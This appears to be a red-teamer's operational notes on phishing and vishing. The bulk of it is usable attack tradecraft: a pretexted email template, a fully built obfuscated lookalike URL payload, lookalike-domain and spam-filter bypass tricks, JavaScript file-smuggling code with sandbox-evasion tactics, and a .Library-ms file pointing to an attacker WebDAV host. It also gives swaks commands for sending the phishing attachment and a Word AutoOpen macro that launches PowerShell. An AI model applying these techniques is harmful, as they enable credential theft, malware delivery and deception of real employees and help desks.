Phishing

Extensions

• Getting a user to download a malicious browser extension can be an instant win
• They can have immense privileges, and can have a lot of pretext for installation

Getting Someone to Install the Extension

• Usually, it seems online meeting software is the go-to here
• Publish a meeting software that exfiltrates all browser cookies/tokens, and get them to install it

Conversation Pretext

• Can be a bit tricky sometimes to get a conversation started with someone from support, for example, but you can reach out and say things like:
  • “Hi! I’m a student interested in working here…”
  • “Hi! My account isn’t working, I don’t know why. Can we meet…”

Phishing Pages

Spoofing a site

• Can use something like open-lovable to clone and recreate any web app as a React app
  • Since this uses JS, this also has the added benefit of throwing off some phishing detection
• SingleFile is good for downloading pages to spoof
  • Make sure preferences don’t include JavaScript
  • Strip out SingleFile comment (near top) along with anything with an “sf” prefix and links to the original site
• If we get hit with Azure/O365, try using OAuthSeeker

Spoofing a domain

• Usually, lookalikes are the best option here. Unfortunately, we can’t combine different Unicode scripts, like Latin and Cyrillic
• However, extended Latin characters still count as Latin script, including:
  • Latin Extended-A (U+0100–U+017F)
  • Latin Extended-B (U+0180–U+024F)
  • Latin Extended Additional (U+1E00–U+1EFF)
  • Latin Extended-C through E
• The best test for these characters is to just paste a domain including them into Chrome/Firefox, and see if it corrects to punyscript
  • For example, https://nccgroưp.com/ doesn’t autocorrect, so it could be a great candidate
• Some good resources:
  • Elfdalian Alphabet
  • Vietnamese Alphabet
  • List of Latin Alphabets
• To test Latin domain candidates, use my Verisign Latin IDN Domain Checker

Zendesk

• You can get a domain on Zendesk.com to send emails from
• Zendesk also has IT stuff, so you can make a ticket and assign it to a user
  • This will send them an email with the ticket information, which we can use to have them click a link

Getting users to click a link

• Registering a domain and using mailgun seems to be a good method of controlling contents of an email

Bypassing Spam Filters

• Use Phishious to test an email to see if it would bounce or be caught in spam
• Setting up DMARC/DKIM/SPF for evilginx: https://fortbridge.co.uk/research/add-spf-dmarc-dkim-mx-records-evilginx/
• If we have more research time, and we know the victim’s inbox type:
  • Use espoofer to figure out differences between the RFC and the way the email headers are parsed
  • Discussed in this BH talk
  • Also covered in depth by this research paper

Spoofing a domain

• Depending on DMARC/DKIM, we can spoof a domain using a tool like https://emkei.cz/

Call to Actions

• Using a call to action is a great method of getting a victim to click a link
• This could take the form of an attached document, a big “Acknowledge” button, or something about updating personal information (like Tax info)
  • It can be especially clever to use publicly available resources, such as an available PDF document
  • Modifying a link at the bottom and adding a call to action at the bottom has a great success rate, for example:

Dear Team,

Due to operational changes within {company}, we are updating our language to the {document} for {year}. In compliance with regulations on amended documents, we require your acknowledgement of receipt of these changes. **To complete your acknowledgement, please navigate to the last page of the attached PDF and click the link provided in the amended article.**

Thank you for your continued support in upholding this year's mission.

Sincerely,

• Then, force them to sign-in via Okta or something to do the acknowledgement

Spoofing any site in a link

• Often, this isn’t actually necessary, as we can just make a pretty email that has a button to click.

Techniques

• Uses @ character to tell the browser that everything before the @ is simply authentication for the following page (an encoded tinyurl site) - I didn’t find an arbitrary redirect on github
  • You can’t use the @ technique after a domain AND path have been specified, so specify fake paths using a / Unicode lookalike: ∕ (effectively making the TLD in the domain very very long)
  • This lookalike character is a unicode division slash without any numbers (think ⅓)
• You can actually URL encode every single character in a link except for the /, so the entire tinyurl link is encoded
• & can actually be included without encoding in the authentication information (prior to the @), so I included bogus URL parameters from an amazon product link to make it look more realistic (hiding the URL encoded link within)
• For google meets, a link starting with a valid URL (e.g. https://github.com) will be underlined, so I included some hidden unicode characters to break the link

Example

• https:// - start of URL
• U+E0001 U+E0020 U+E007F - hidden Unicode characters to break link underlining functionality in Google meets
• Used https://embracethered.com/blog/ascii-smuggler.html to encode ` `
• 󠁿github.com - normal github domain
• ∕praetorian-inc∕Cerebrum∕tree∕main∕Personal%20Spaces∕khael.kugler - realistic path using fake ∕ character
• &diff=%75%6E%69%66%69%65%64&uuid=259d9f6c-ea4f-492b-a741-8ca016e53a70&ref=main_1598392 - fake URL parameters used to hide the actual payload
• @%74%69%6E%79%75%72%6C%2E%63%6F%6D/%33%39%74%7A%72%6A%79%6A - payload decoding to tinyurl.com/39tzrjyj, starting with @

• #&whitespace=ignore&inline=false&workflow=ci-deploy-container-ghcr-ref-main - more fake parameters, starting with a # to not confuse tinyurl’s redirection

• When emailing, choose a font that looks good. Menlo is alright, but a bit too code-related

Final payload: https://󠀁󠀠󠁿github.com∕praetorian-inc∕Cerebrum∕tree∕main∕Personal%20Spaces∕khael.kugler&diff=%75%6E%69%66%69%65%64&uuid=259d9f6c-ea4f-492b-a741-8ca016e53a70&ref=main_1598392@%74%69%6E%79%75%72%6C%2E%63%6F%6D/%33%39%74%7A%72%6A%79%6A#&whitespace=ignore&inline=false&workflow=ci-deploy-container-ghcr-ref-main

Other example payloads: https://github.com∕praetorian-inc∕noseyparker∕releases∕download∕v0.23.0∕secret-noseyparker-v0.23.0-aarch64-apple-darwin.tar.gz&conplccinc=259d9f6c-ea4f-492b-a741-8ca016e53a70ts=abthh8sjiwjcbgqcpkynoq55p8khgag&dasin=B07774L6@%74%69%6E%79%75%72%6C%2E%63%6F%6D/%79%63%38%78%61%66%74%32/&96298722-d186-4e28-b5e9-2ca14f49d977=1

https://www.amazon.com∕gp∕product∕B008A0GNA8pr=conplccinc=259d9f6c-ea4f-492b-a741-8ca016e53a70ts=abthh8sjiwjcbgqcpkynoq55p8khgag&dasin=B07774L6TT&plattr=mathplace=priceblockimp@%74%69%6E%79%75%72%6C%2E%63%6F%6D/%79%63%38%78%61%66%74%32?=96298722-d186-4e28-b5e9-2ca14f49d977

• Can also sort of be used to bypass URL validation
  • Portswigger URL bypass techniques: https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet

File Downloading Techniques

File Smuggling - thanks to Print3M

• Rather than getting a user to download a file from a server, simply store the entire file in JavaScript
• This has two bonuses: the file doesn’t need to be fetched from a server, and it also doesn’t generate any network logs
• Example:

// File: smuggler.js
function __downloadFile(byteArray, fileName, mimeType) {
    let blob = new Blob([new Uint8Array(byteArray)], { type: mimeType })
    let url = URL.createObjectURL(blob)
    let a = document.createElement("a")
    a.href = url
    a.download = fileName
    document.body.appendChild(a)
    a.click()
    document.body.removeChild(a)
    URL.revokeObjectURL(url)
}
 
// This function is executed from React on "click" event 
function downloadFile() {
    // PUT YOUR BINARY DATA HERE!!!
    const data = [72, 101, 108, 108, 111, 32, 87, 111, 114, 108, 100]
    __downloadFile(data, "file.txt", "text/plain")
}

Sandbox Detection - thanks to Print3M

• Execute JavaScript - most scanners still won’t run JavaScript! Using React actually gives us this OPSEC measure out-of-the-box.
• Timeout - wait a second before smuggling malware. The victim probably won’t click any faster anyway. If the sandbox is waiting for the page to render, a second’s wait is already likely to discourage it.
• OS detection - if the OS doesn’t match with our target, then smuggle a harmless decoy file. This will protect us from burning the operation.
• Screen size - bots often set the incorrect screen size. Using this technique we are also able to detect mobile device users to whom we do not want to serve our malware.
• User Agent - bots often have an unusual User Agent that does not match real browsers.
• Trap buttons - add hidden trap buttons that only the bot clicks. This way we will recognize if a bot is walking around the site.
• Bad HTML practices - using bad HTML practices can naturally obscure the meaning of our code. E.g. using a div element with an onclick action instead of the classic button element can cause the sandbox to not click it.

Abuse Example

• Trick a user to go to a link
• Provide a button that downloads a docx file, directly from Javascript
• Have macros embedded in the blurry file, GG

Vishing

Recon

• Harvest personal/corporate details from linkedin/github
• Identify high-value identifies
• Identify exact help-desk process for a password/MFA reset

IT Helpdesk Techniques

• Asking for a one-time password reset can have great success, especially if information on the impersonate employee can be gained
• This will often be things like ID number, manager name, email, etc.

Windows

• Can’t send malware directly by email, so we need to get them to download the spreadsheet with macros from a link
  • Also need to “blur” the spreadsheet so victim clicks “Enable Editing” to allow macros
  • Avoid Mark of the Web (MOTW) by putting malware inside 7zip, ISO, IMG
• Windows library files are less well-known and can be equally effective for hosting files
• Executing .Library-ms file into executing .lnk file
• These files display remote directories like local directories, where we put .lnk file
  • pip3 install wsgidav for a WebDAV server to host/serve files
  • usage: wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root {directory}
• config.Library-ms file contents:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://{kali_IP}</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

• Sending a phishing email with the share:
  • sudo swaks -t {to_email} -t {to_email} --from {from_email} --attach @config.Library-ms --server {mail_server} --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
• Using SMTP with swaks:
  • To use an SMTP server, we need a user whose credentials we know on the domain swaks --server {IP_with_SMTP} --body @{body_txt_file} -ap --from {user@domain} --to {target@domain} --auth-user {user@domain} --auth-password {password} --attach @{file_to_attach} --header "{header_text}"

Misc

Docx Word Macro

• To make a Word macro that runs on document open, the following will work at a basic level:

Sub AutoOpen()

  MyMacro

End Sub
Sub Document_Open()

  MyMacro

End Sub
Sub MyMacro()

  CreateObject("Wscript.Shell").Run "powershell"

End Sub